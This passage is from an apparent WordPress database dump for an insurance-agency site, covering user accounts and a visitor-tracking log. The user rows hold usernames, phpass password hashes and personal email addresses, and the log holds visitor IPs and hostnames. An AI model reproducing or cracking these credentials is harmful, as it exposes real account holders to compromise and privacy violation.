19:30:32','',0,'avi'),(200,'avistern','$P$BOoVh.pTpZMim2TTcLZfGAzynx0eYq1','avistern','betuach4u@aol.com','','2016-03-17 19:35:09','',0,'avistern'),(201,'astern','$P$BNBZObrIPpcjpHFN6w7DVraywTv9EE.','astern','avi_stern@bfgny.com','','2016-03-17 19:36:51','',0,'astern'),(203,'Pixiedust','$P$BTY26Qz/Q2wfod7CEYB4XHIaMXom8V0','pixiedust','hdebby81@yahoo.com','','2016-03-18 19:09:48','',0,'Pixiedust'),(204,'paskesz1','$P$BxKcd4.Ml3CKypDAtATYlqx9gFC5mn1','paskesz1','abepask@gmail.com','','2016-03-21 20:46:41','',0,'paskesz1'),(207,'kmonroe','$P$B5HfvPHmNNBDaHfPAjuiXTNwVHGYja.','kmonroe','cjs@wittfc.com','','2016-03-24 13:25:35','',0,'kmonroe'),(209,'shraga','$P$BJiX8nc1276hjQ7Mh6QqykDZFoeLIj.','shraga','Shraga_stein@bfgny.com','','2016-03-29 20:59:05','',0,'shraga'),(212,'avistern1','$P$Bc8MECwL014qP4m2gSm49t72MtOTu81','avistern1','lk1621@aol.com','','2016-03-31 16:45:40','',0,'avistern1'),(213,'wandaburrell','$P$Bi2tTXtZTAIT5JegseMPjFwoTiE/93.','wandaburrell','wandaburrell1@comcast.com','','2016-04-02 15:56:29','',0,'wandaburrell'),(216,'wandaburrell1','$P$BILrzjnfY.E0WmkeiVSdQgq3ngZWah1','wandaburrell1','wandaburrell1@comcast.net','','2016-04-02 16:02:31','',0,'wandaburrell1'),(218,'hglanzer','$P$Bci/V8ft6KpbE.FtVH4g4KCZtsQ2iZ1','hglanzer','hirsch.glanzer3@verizon.net','','2016-04-05 19:35:48','',0,'hglanzer'),(219,'margomacik','$P$BR.5D/QzzWI.dKh8Ufxoqvz4FT4Va01','margomacik','Margo_macik@yahoo.com','','2016-04-11 23:10:29','',0,'margomacik'),(222,'EksteinFinancial','$P$B1YgQVlByis1b45ttAt/jdm2OQV1kA0','eksteinfinancial','goldykraus@gmail.com','','2016-04-12 14:46:15','',0,'EksteinFinancial'),(225,'Melissa83d','$P$BaoyixlJ0UwTfo39NZYj5ZTbLThsZd0','melissa83d','melissa83d@yahoo.com','','2016-04-25 14:29:39','',0,'Melissa83d'),(227,'bartcollard@yahoo.com','$P$Bu2FKXjrnBD8dLk0oBL7tA5A8grmFh/','bartcollardyahoo-com','bartcollard@yahoo.com','','2016-04-28 13:54:21','',0,'bartcollard@yahoo.com'); /*!40000 ALTER TABLE `wp_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wassup` -- DROP TABLE IF EXISTS `wp_wassup`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wassup` ( `id` mediumint(9) unsigned NOT NULL AUTO_INCREMENT, `wassup_id` varchar(60) NOT NULL, `timestamp` varchar(20) NOT NULL, `ip` varchar(50) DEFAULT NULL, `hostname` varchar(150) DEFAULT NULL, `urlrequested` text, `agent` varchar(255) DEFAULT NULL, `referrer` text, `search` varchar(255) DEFAULT NULL, `searchpage` int(11) unsigned DEFAULT '0', `os` varchar(15) DEFAULT NULL, `browser` varchar(50) DEFAULT NULL, `language` varchar(5) DEFAULT NULL, `screen_res` varchar(15) DEFAULT NULL, `searchengine` varchar(25) DEFAULT NULL, `spider` varchar(50) DEFAULT NULL, `feed` varchar(50) DEFAULT NULL, `username` varchar(50) DEFAULT NULL, `comment_author` varchar(50) DEFAULT NULL, `spam` varchar(5) DEFAULT '0', `url_wpid` varchar(50) DEFAULT NULL, `subsite_id` mediumint(9) unsigned DEFAULT '0', UNIQUE KEY `id` (`id`), KEY `idx_wassup` (`wassup_id`(32)), KEY `ip` (`ip`), KEY `timestamp` (`timestamp`) ) ENGINE=InnoDB AUTO_INCREMENT=29796 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wassup` -- LOCK TABLES `wp_wassup` WRITE; /*!40000 ALTER TABLE `wp_wassup` DISABLE KEYS */; INSERT INTO `wp_wassup` VALUES (1,'00000000000000000000000000000001','1456990786','127.0.0.1','localhost','[404] Welcome to WassUP','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 WassUp/1.9 (http://www.wpwp.org)','http://www.wpwp.org','',0,'Win7','Chrome 48','us','','','','','admin2','','0',NULL,0),(2,'0b_e3d80da6f0808e5ff5d40352a91841fc','1456990853','122.168.196.170','abts-mp-static-170.196.168.122.airtelbroadband.in','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','in','','','','','','','0','0',0),(5,'0b_e3d80da6f0808e5ff5d40352a91841fc','1456990857','122.168.196.170','abts-mp-static-170.196.168.122.airtelbroadband.in','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','in','','','','','','','0','0',0),(8,'0b_158d466026338ed65347cc8c6c4a7365','1456991178','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10,'0b_9bbdc65c697b93cc1f37f5281f8dff5e','1456992975','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13,'0b_4775a99ae3efd354607a6d7633c36762','1456993532','66.249.75.103','crawl-66-249-75-103.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14,'0b_afd61345332df344d3e587e98c03e334','1456995579','144.76.4.148','static.148.4.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16,'0b_afd61345332df344d3e587e98c03e334','1456995581','144.76.4.148','static.148.4.76.144.clients.your-server.de','/SSO/235_38.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(19,'0b_afd61345332df344d3e587e98c03e334','1456995587','144.76.4.148','static.148.4.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(22,'0b_afd61345332df344d3e587e98c03e334','1456995589','144.76.4.148','static.148.4.76.144.clients.your-server.de','/SSO/235_38.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25,'0b_afd61345332df344d3e587e98c03e334','1456995591','144.76.4.148','static.148.4.76.144.clients.your-server.de','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(28,'0b_afd61345332df344d3e587e98c03e334','1456995595','144.76.4.148','static.148.4.76.144.clients.your-server.de','/calc.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(31,'0b_12b77f091b375aa3dd611240e8cfb7e2','1456996545','104.129.28.178','104.129.28.178.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(34,'0b_1af2985d2e343e7aaf8d4f39cdb498c2','1456996706','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(37,'0b_c53fbd575c9b743fdb9bfb08b589a8c7','1456997170','69.30.210.242','69.30.210.242','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(38,'0b_c53fbd575c9b743fdb9bfb08b589a8c7','1456997182','69.30.210.242','69.30.210.242','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(41,'0b_c53fbd575c9b743fdb9bfb08b589a8c7','1456997201','69.30.210.242','69.30.210.242','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(43,'0b_234ca4420a704fc9a2d4e3c16254ce12','1456998710','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(44,'0b_a1c2d2c0f246a15811cc31d59c8e8b97','1456999203','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(46,'0b_3c6e2db266ea56d1f91fd1a1bf4cb88a','1456999228','69.30.210.242','69.30.210.242','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(49,'0b_3c6e2db266ea56d1f91fd1a1bf4cb88a','1456999244','69.30.210.242','69.30.210.242','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(52,'0b_e910db404353262a41f51bb7f793c74c','1457001167','69.197.177.26','69.197.177.26','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(55,'0b_e910db404353262a41f51bb7f793c74c','1457001184','69.197.177.26','69.197.177.26','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(58,'0b_e910db404353262a41f51bb7f793c74c','1457001195','69.197.177.26','69.197.177.26','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(59,'0b_c90e744cad92f1e47248aae6f6c9ae1a','1457002078','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(61,'0b_c90e744cad92f1e47248aae6f6c9ae1a','1457002090','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(62,'0b_afcb591d4116adf0365eb80b25d94511','1457003055','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/carriers/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(64,'0b_d769c59225e17948f946e84d9095a493','1457003686','192.240.106.138','WIN-QRIEB13SG5H','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','','','','','','','','0','0',0),(67,'0b_0d486216e67a42d90519ed0e03ec424e','1457005887','192.240.106.138','WIN-QRIEB13SG5H','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','','','','','','','','0','0',0),(68,'0b_e1d76c3b80eb06affb3f5b3ddda2a1bd','1457006149','78.145.19.111','host-78-145-19-111.as13285.net','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(70,'0b_e1d76c3b80eb06affb3f5b3ddda2a1bd','1457006151','78.145.19.111','host-78-145-19-111.as13285.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(71,'0b_3eb34aa8b96144c00f0d3ee23494fde6','1457006181','62.24.252.133','host-62-24-252-133.as13285.net','/robots.txt','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/robots.txt','',0,'WinXP','IE 8','','','','Unknown Spider','','','','0','0',0),(73,'0b_3eb34aa8b96144c00f0d3ee23494fde6','1457006182','62.24.252.133','host-62-24-252-133.as13285.net','/meet-the-eib-team/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/meet-the-eib-team/','',0,'WinXP','IE 8','','','','','','','','0','0',0),(74,'0b_3eb34aa8b96144c00f0d3ee23494fde6','1457006182','62.24.252.133','host-62-24-252-133.as13285.net','/contact/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/contact/','',0,'WinXP','IE 8','','','','','','','','0','0',0),(77,'0b_a297f32f24a061849f9c295626bd743c','1457007435','65.19.167.132','65.19.167.132','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://hundejo.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(80,'0b_d724784cfab7a2ccd31278d069ab68c0','1457007445','198.50.200.139','198.50.200.139','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://hundejo.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(82,'0b_aa4db48b2a79365c386120dc75abb0af','1457009053','66.249.75.95','crawl-66-249-75-95.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(85,'0b_9bbb0ea9b8f2a5611bd133fe81b24eac','1457009053','185.2.4.20','lhcp1020.webapps.net','/shop/js/mage/cookies.js','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','empireins.com/shop','',0,'WinXP','Chrome 5','us','','','','','','','3','0',0),(86,'0b_aa4db48b2a79365c386120dc75abb0af','1457009158','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(89,'0b_f688e59c599f58a3f3f53abdb8d2e092','1457010431','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(91,'0b_ced1c6a7fede06b0da457f3bcc63896e','1457010679','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(92,'0b_ced1c6a7fede06b0da457f3bcc63896e','1457010894','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(94,'0b_8d3a2d0c8525ce42e2b07a1be0bf5529','1457012369','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(97,'0b_87e06d8e259089324ac8395c20129ff8','1457012380','199.30.25.12','msnbot-199-30-25-12.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(100,'0b_8d3a2d0c8525ce42e2b07a1be0bf5529','1457012443','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(103,'0b_cb7d706b79c7d847d22e6d027b7e9383','1457012996','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(104,'0b_a7b613ae499763a8a2c377f33d81f56a','1457014133','40.77.167.33','msnbot-40-77-167-33.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(107,'0b_333d21117c4299b2b8d0100fcc43d78e','1457014219','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(109,'0b_51d9fc6a519c7921aef06a13827bd762','1457014418','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(110,'0b_51d9fc6a519c7921aef06a13827bd762','1457014420','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(113,'0b_be6098977aeeda8c88cf3e150d6f2744','1457014659','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(115,'0b_be6098977aeeda8c88cf3e150d6f2744','1457014660','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(116,'0b_af97c1187ed98588a17c490b3f8e53f9','1457015043','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(118,'0b_f8529edc96bfb4e4bb014148469e1581','1457015727','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(121,'0b_f8529edc96bfb4e4bb014148469e1581','1457015741','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(122,'0b_63dfe7ecd73f69ebc5b07ace2f0ef0f2','1457016869','67.81.56.252','ool-435138fc.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(125,'0b_63dfe7ecd73f69ebc5b07ace2f0ef0f2','1457016870','67.81.56.252','ool-435138fc.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(127,'0b_63dfe7ecd73f69ebc5b07ace2f0ef0f2','1457016874','67.81.56.252','ool-435138fc.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(128,'0b_63dfe7ecd73f69ebc5b07ace2f0ef0f2','1457016887','67.81.56.252','ool-435138fc.dyn.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(131,'0b_63dfe7ecd73f69ebc5b07ace2f0ef0f2','1457016895','67.81.56.252','ool-435138fc.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/case-status/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(133,'0b_76f4db8941e677bb89dfdb0e1b62cb7a','1457016901','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(136,'0b_63dfe7ecd73f69ebc5b07ace2f0ef0f2','1457016905','67.81.56.252','ool-435138fc.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(139,'0b_76f4db8941e677bb89dfdb0e1b62cb7a','1457017016','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(142,'0b_2d54206b6ce08b8de939d9a51ac89598','1457017613','100.43.90.9','spider-100-43-90-9.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(145,'0b_31a6c67f35a13aab742553c02408f27a','1457017750','194.33.183.1','194.33.183.1','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.co.uk/','_notprovided_',1,'Win7','Chrome 48','gb','1280 x 1024','Google UK','','','','','0','0',0),(148,'0b_31a6c67f35a13aab742553c02408f27a','1457017776','194.33.183.1','194.33.183.1','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(149,'0b_31a6c67f35a13aab742553c02408f27a','1457017807','194.33.183.1','194.33.183.1','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(152,'0b_e23b8da5202a0e78776719bea149c1d2','1457018398','66.249.75.103','crawl-66-249-75-103.googlebot.com','/under.html','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(154,'0b_878727cc6687634ea185c26676a066f7','1457018423','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(157,'0b_5a0e69462af50b4c9d2f9d5845220ce3','1457018808','40.77.167.33','msnbot-40-77-167-33.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(160,'0b_4dc9921599234bf91c386596f227c161','1457019122','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(163,'0b_4dc9921599234bf91c386596f227c161','1457019142','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(164,'0b_f0a9dc0eb860dd22bfb0b767187186a5','1457019281','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(167,'0b_f0a9dc0eb860dd22bfb0b767187186a5','1457019282','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(170,'0b_cfa5c4e64c9d30b2ff7a168346bfa606','1457019524','54.86.30.209','ec2-54-86-30-209.compute-1.amazonaws.com','/','roboto','','',0,'','','','','','','','','','0','0',0),(173,'0b_f0a9dc0eb860dd22bfb0b767187186a5','1457019547','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(176,'0b_4dc9921599234bf91c386596f227c161','1457019994','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(179,'0b_4dc9921599234bf91c386596f227c161','1457019995','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(181,'0b_4dc9921599234bf91c386596f227c161','1457020169','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(182,'0b_912be6801d9faff121aaa872ea24db51','1457020907','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(185,'0b_912be6801d9faff121aaa872ea24db51','1457020911','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(187,'0b_912be6801d9faff121aaa872ea24db51','1457020915','67.212.162.98','scan03.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(188,'0b_912be6801d9faff121aaa872ea24db51','1457020927','67.212.162.98','scan03.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 